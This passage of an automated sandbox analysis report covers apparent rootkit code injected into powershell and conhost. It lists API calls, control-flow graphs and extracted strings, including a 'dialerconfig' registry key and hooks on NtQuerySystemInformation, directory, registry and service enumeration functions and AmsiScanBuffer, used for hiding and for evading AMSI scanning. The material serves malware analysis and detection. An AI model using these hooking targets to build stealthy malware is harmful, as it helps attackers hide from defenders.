                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f07578d2ee1a2dbeba88a0441066a180f91c8c2748cebc38db4a5775f5ca2a2b
                                                                  • Instruction ID: c51f6fb6484e1be4127366cecb7318abcd16509e8944b9f3dc8e2278b97bac2e
                                                                  • Opcode Fuzzy Hash: f07578d2ee1a2dbeba88a0441066a180f91c8c2748cebc38db4a5775f5ca2a2b
                                                                  • Instruction Fuzzy Hash: E6914862B2FA8D1FE7A996AC58A46707BD0EF66210B0901FBD49CC71E3DD19AC05C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5926fbb382447234e5aeafcccfab86f61687a8049385348c6995385692036b9e
                                                                  • Instruction ID: 06da7994bfb36a09c9a37e0c9aaa0894bced4f58d6e9e128b4214efbe24bc513
                                                                  • Opcode Fuzzy Hash: 5926fbb382447234e5aeafcccfab86f61687a8049385348c6995385692036b9e
                                                                  • Instruction Fuzzy Hash: 8E21D653B2FBCA1FE7A596A814A5164BBD0EF6665471941FAD4ACC71E3DC092C058301

                                                                  Execution Graph

                                                                  Execution Coverage:0.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:74
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 7902 14ecb4a1ac8 7909 14ecb4a1628 GetProcessHeap HeapAlloc 7902->7909 7904 14ecb4a1ad7 7905 14ecb4a1ade SleepEx 7904->7905 7908 14ecb4a1598 StrCmpIW StrCmpW 7904->7908 7960 14ecb4a18b4 7904->7960 7906 14ecb4a1628 50 API calls 7905->7906 7906->7904 7908->7904 7977 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7909->7977 7911 14ecb4a1650 7978 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7911->7978 7913 14ecb4a1658 7979 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7913->7979 7915 14ecb4a1661 7980 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7915->7980 7917 14ecb4a166a 7981 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7917->7981 7919 14ecb4a1673 7982 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7919->7982 7921 14ecb4a167c 7983 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7921->7983 7923 14ecb4a1685 7984 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7923->7984 7925 14ecb4a168e RegOpenKeyExW 7926 14ecb4a18a6 7925->7926 7927 14ecb4a16c0 RegOpenKeyExW 7925->7927 7926->7904 7928 14ecb4a16e9 7927->7928 7929 14ecb4a16ff RegOpenKeyExW 7927->7929 7985 14ecb4a12bc RegQueryInfoKeyW 7928->7985 7930 14ecb4a173a RegOpenKeyExW 7929->7930 7931 14ecb4a1723 7929->7931 7935 14ecb4a175e 7930->7935 7936 14ecb4a1775 RegOpenKeyExW 7930->7936 7994 14ecb4a104c RegQueryInfoKeyW 7931->7994 7938 14ecb4a12bc 16 API calls 7935->7938 7939 14ecb4a1799 7936->7939 7940 14ecb4a17b0 RegOpenKeyExW 7936->7940 7941 14ecb4a176b RegCloseKey 7938->7941 7942 14ecb4a12bc 16 API calls 7939->7942 7943 14ecb4a17eb RegOpenKeyExW 7940->7943 7944 14ecb4a17d4 7940->7944 7941->7936 7947 14ecb4a17a6 RegCloseKey 7942->7947 7945 14ecb4a1826 RegOpenKeyExW 7943->7945 7946 14ecb4a180f 7943->7946 7948 14ecb4a12bc 16 API calls 7944->7948 7951 14ecb4a184a 7945->7951 7952 14ecb4a1861 RegOpenKeyExW 7945->7952 7950 14ecb4a104c 6 API calls 7946->7950 7947->7940 7949 14ecb4a17e1 RegCloseKey 7948->7949 7949->7943 7953 14ecb4a181c RegCloseKey 7950->7953 7954 14ecb4a104c 6 API calls 7951->7954 7955 14ecb4a189c RegCloseKey 7952->7955 7956 14ecb4a1885 7952->7956 7953->7945 7957 14ecb4a1857 RegCloseKey 7954->7957 7955->7926 7958 14ecb4a104c 6 API calls 7956->7958 7957->7952 7959 14ecb4a1892 RegCloseKey 7958->7959 7959->7955 8004 14ecb4a14a4 7960->8004 7977->7911 7978->7913 7979->7915 7980->7917 7981->7919 7982->7921 7983->7923 7984->7925 7986 14ecb4a1327 GetProcessHeap HeapAlloc 7985->7986 7987 14ecb4a148a RegCloseKey 7985->7987 7988 14ecb4a1476 GetProcessHeap HeapFree 7986->7988 7989 14ecb4a1352 RegEnumValueW 7986->7989 7987->7929 7988->7987 7990 14ecb4a13a5 7989->7990 7990->7988 7990->7989 7992 14ecb4a141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7990->7992 7993 14ecb4a13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7990->7993 7999 14ecb4a152c 7990->7999 7992->7990 7993->7992 7995 14ecb4a11b5 RegCloseKey 7994->7995 7997 14ecb4a10bf 7994->7997 7995->7930 7996 14ecb4a10cf RegEnumValueW 7996->7997 7997->7995 7997->7996 7998 14ecb4a114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7997->7998 7998->7997 8000 14ecb4a157c 7999->8000 8001 14ecb4a1546 7999->8001 8000->7990 8001->8000 8002 14ecb4a155d StrCmpIW 8001->8002 8003 14ecb4a1565 StrCmpW 8001->8003 8002->8001 8003->8001 8005 14ecb4a14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 8004->8005 8006 14ecb4a14c1 GetProcessHeap HeapFree 8004->8006 8006->8005 8006->8006

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 0000014ECB4A3639
                                                                  • PathFindFileNameW.SHLWAPI ref: 0000014ECB4A3648
                                                                    • Part of subcall function 0000014ECB4A3C74: StrCmpNIW.SHLWAPI(?,?,?,0000014ECB4A254B), ref: 0000014ECB4A3C8C
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3BCE
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3BFC
                                                                    • Part of subcall function 0000014ECB4A3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C1E
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C39
                                                                    • Part of subcall function 0000014ECB4A3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C5A
                                                                  • CreateThread.KERNELBASE ref: 0000014ECB4A368F
                                                                    • Part of subcall function 0000014ECB4A1D40: GetCurrentThread.KERNEL32 ref: 0000014ECB4A1D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: 446be610b8d5eb5db247b132eab7b0ed210335f6137fe254784a06e4b0cb33bb
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: 3B118831A1C6218DFF709B24B8C53EB62E2F7A4B45F5041159706816F5FF7CC038AA00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: b718ff1bf738cf45eaa94060793e083fa5cc7f1eb7d41b8d47b72f5485542534
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: A3911372B056508BEF64CF25E084BAD73D1F756B94F5481249F4A2BBA8FE38D816D700

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0000014ECB4A1628: GetProcessHeap.KERNEL32 ref: 0000014ECB4A1633
                                                                    • Part of subcall function 0000014ECB4A1628: HeapAlloc.KERNEL32 ref: 0000014ECB4A1642
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A16B2
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A16DF
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A16F9
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1719
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1734
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1754
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A176F
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A178F
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A17AA
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A17CA
                                                                  • SleepEx.KERNELBASE ref: 0000014ECB4A1AE3
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A17E5
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1805
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1820
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1840
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A185B
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A187B
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1896
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A18A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 7a32dc024528bf182ba70241aa4d706cb4a0fc69ed4b47380085e6d64f5d3450
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: 87310C75658621DFEF549B26F9D03EA22E4BB86FC0F4450229F09876F6FF20C870A250

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 205 14ecb4a2bf4-14ecb4a2c6d 207 14ecb4a2f88-14ecb4a2fab 205->207 208 14ecb4a2c73-14ecb4a2c79 205->208 208->207 209 14ecb4a2c7f-14ecb4a2c82 208->209 209->207 210 14ecb4a2c88-14ecb4a2c8b 209->210 210->207 211 14ecb4a2c91-14ecb4a2ca1 GetModuleHandleA 210->211 212 14ecb4a2cb5 211->212 213 14ecb4a2ca3-14ecb4a2cb3 GetProcAddress 211->213 214 14ecb4a2cb8-14ecb4a2cd6 212->214 213->214 214->207 216 14ecb4a2cdc-14ecb4a2cfb StrCmpNIW 214->216 216->207 217 14ecb4a2d01-14ecb4a2d05 216->217 217->207 218 14ecb4a2d0b-14ecb4a2d15 217->218 218->207 219 14ecb4a2d1b-14ecb4a2d22 218->219 219->207 220 14ecb4a2d28-14ecb4a2d3b 219->220 221 14ecb4a2d3d-14ecb4a2d49 220->221 222 14ecb4a2d4b 220->222 223 14ecb4a2d4e-14ecb4a2d52 221->223 222->223 224 14ecb4a2d54-14ecb4a2d60 223->224 225 14ecb4a2d62 223->225 226 14ecb4a2d65-14ecb4a2d6f 224->226 225->226 227 14ecb4a2e55-14ecb4a2e59 226->227 228 14ecb4a2d75-14ecb4a2d78 226->228 229 14ecb4a2f7a-14ecb4a2f82 227->229 230 14ecb4a2e5f-14ecb4a2e62 227->230 231 14ecb4a2d8a-14ecb4a2d94 228->231 232 14ecb4a2d7a-14ecb4a2d87 call 14ecb4a1934 228->232 229->207 229->220 235 14ecb4a2e64-14ecb4a2e70 call 14ecb4a1934 230->235 236 14ecb4a2e73-14ecb4a2e7d 230->236 233 14ecb4a2dc8-14ecb4a2dd2 231->233 234 14ecb4a2d96-14ecb4a2da3 231->234 232->231 239 14ecb4a2dd4-14ecb4a2de1 233->239 240 14ecb4a2e02-14ecb4a2e05 233->240 234->233 238 14ecb4a2da5-14ecb4a2db2 234->238 235->236 242 14ecb4a2ead-14ecb4a2eb0 236->242 243 14ecb4a2e7f-14ecb4a2e8c 236->243 247 14ecb4a2db5-14ecb4a2dbb 238->247 239->240 248 14ecb4a2de3-14ecb4a2df0 239->248 250 14ecb4a2e07-14ecb4a2e11 call 14ecb4a1bc8 240->250 251 14ecb4a2e13-14ecb4a2e20 lstrlenW 240->251 245 14ecb4a2ebd-14ecb4a2eca lstrlenW 242->245 246 14ecb4a2eb2-14ecb4a2ebb call 14ecb4a1bc8 242->246 243->242 252 14ecb4a2e8e-14ecb4a2e9b 243->252 256 14ecb4a2ecc-14ecb4a2edb call 14ecb4a1c00 245->256 257 14ecb4a2edd-14ecb4a2ee7 call 14ecb4a3c74 245->257 246->245 272 14ecb4a2ef2-14ecb4a2efd 246->272 254 14ecb4a2e4b-14ecb4a2e50 247->254 255 14ecb4a2dc1-14ecb4a2dc6 247->255 258 14ecb4a2df3-14ecb4a2df9 248->258 250->251 250->254 261 14ecb4a2e22-14ecb4a2e31 call 14ecb4a1c00 251->261 262 14ecb4a2e33-14ecb4a2e45 call 14ecb4a3c74 251->262 260 14ecb4a2e9e-14ecb4a2ea4 252->260 266 14ecb4a2eea-14ecb4a2eec 254->266 255->233 255->247 256->257 256->272 257->266 258->254 269 14ecb4a2dfb-14ecb4a2e00 258->269 271 14ecb4a2ea6-14ecb4a2eab 260->271 260->272 261->254 261->262 262->254 262->266 266->229 266->272 269->240 269->258 271->242 271->260 277 14ecb4a2eff-14ecb4a2f03 272->277 278 14ecb4a2f74-14ecb4a2f78 272->278 279 14ecb4a2f0b-14ecb4a2f25 call 14ecb4a89f0 277->279 280 14ecb4a2f05-14ecb4a2f09 277->280 278->229 282 14ecb4a2f28-14ecb4a2f2b 279->282 280->279 280->282 284 14ecb4a2f2d-14ecb4a2f4b call 14ecb4a89f0 282->284 285 14ecb4a2f4e-14ecb4a2f51 282->285 284->285 285->278 287 14ecb4a2f53-14ecb4a2f71 call 14ecb4a89f0 285->287 287->278
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: 4f388541a52bfb4f60703e2e5d8c27f2900f96190d1984ecb4aa32e07d28edf5
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: 6CB16D72218AA19AEF688F25E4807EAB3E4F745B84F445016EF09537A5FB35CDA0F340
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: 6fbefcaf485cb9dc5fe418880bbf24c2b2df2cab9ba06b1de959446b6214dfdb
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: 60310C72209B808AEB649F64F8907ED73A4F784744F44442ADB4E47BA9EF38C659D710
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: db69a238a6d7b3f22910f8c31ec01d1e7794a9ea190c68231ef74ad1bf075dc8
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 09312C36218F908AEF649F25E8803DE77A4F788754F540115EB9D43BA8EF38C155CB00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0000014ECB4A1D4B
                                                                    • Part of subcall function 0000014ECB4A20C4: GetModuleHandleA.KERNEL32(?,?,?,0000014ECB4A1D7D), ref: 0000014ECB4A20DC
                                                                    • Part of subcall function 0000014ECB4A20C4: GetProcAddress.KERNEL32(?,?,?,0000014ECB4A1D7D), ref: 0000014ECB4A20ED
                                                                    • Part of subcall function 0000014ECB4A5F60: GetCurrentThreadId.KERNEL32 ref: 0000014ECB4A5F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD267
                                                                  • FlsGetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2EC
                                                                  • SetLastError.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,0000014ECB4AF0FC,?,?,?,?,0000014ECB4AC3CF,?,?,?,?,?,0000014ECB4A7EE0), ref: 0000014ECB4AD35C
                                                                    • Part of subcall function 0000014ECB4ADAFC: HeapAlloc.KERNEL32(?,?,00000000,0000014ECB4AD432,?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4ADB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD384
                                                                    • Part of subcall function 0000014ECB4ADB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000014ECB4A643A), ref: 0000014ECB4ADB8A
